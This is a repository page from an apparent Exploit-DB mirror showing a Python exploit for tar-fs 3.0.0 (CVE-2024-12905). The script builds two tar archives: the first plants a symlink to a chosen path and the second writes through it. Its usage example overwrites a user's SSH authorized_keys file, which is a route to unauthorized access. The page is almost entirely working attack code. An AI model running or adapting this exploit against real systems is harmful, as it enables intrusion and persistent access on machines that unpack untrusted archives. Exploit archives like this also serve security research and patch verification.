bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/52268.py
Exploit-DB 6cef641858 DB: 2025-04-23 
9 changes to exploits/shellcodes/ghdb

tar-fs 3.0.0 - Arbitrary File Write/Overwrite

OpenSSH server (sshd) 9.8p1 - Race Condition

Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution

code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)

WonderCMS 3.4.2 - Remote Code Execution (RCE)

WordPress Core 6.2 - Directory Traversal
Microsoft Windows 11 - Kernel Privilege Escalation
Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
2025-04-23 00:16:28 +00:00

55 lines
No EOL
1.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite
# Date: 17th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mafintosh/tar-fs
# Version: tar-fs 3.0.0
# Tested on: Ubuntu
# CVE: CVE-2024-12905
# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys
# This will generate two tar file: stage_1.tar and stage_2.tar
# Upload stage_1.tar first to unarchive the symlink
# Next, upload stage_2.tar to finally write/overwrite the file on the system
import os
import sys
import tarfile
link_name = "normal_file"
def check_arguments():
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\
Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\
")
sys.exit()
content_file_path = sys.argv[1]
target_file_path = sys.argv[2]
return content_file_path, target_file_path
def create_symlink(link_name, target_path):
os.symlink(target_path, link_name)
print("[+] Created symlink: {link_name} -> {target_path}")
def archive_files(archive_name, file_path):
tar = tarfile.open(archive_name, 'w')
tar.add(file_path, link_name, recursive=False)
tar.close()
print(f"[+] Archived to: {archive_name}")
def main():
content_path, target_file = check_arguments()
stage_1_archive_name = "stage_1.tar"
stage_2_archive_name = "stage_2.tar"
create_symlink(link_name, target_file)
archive_files(stage_1_archive_name, link_name)
archive_files(stage_2_archive_name, content_path)
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink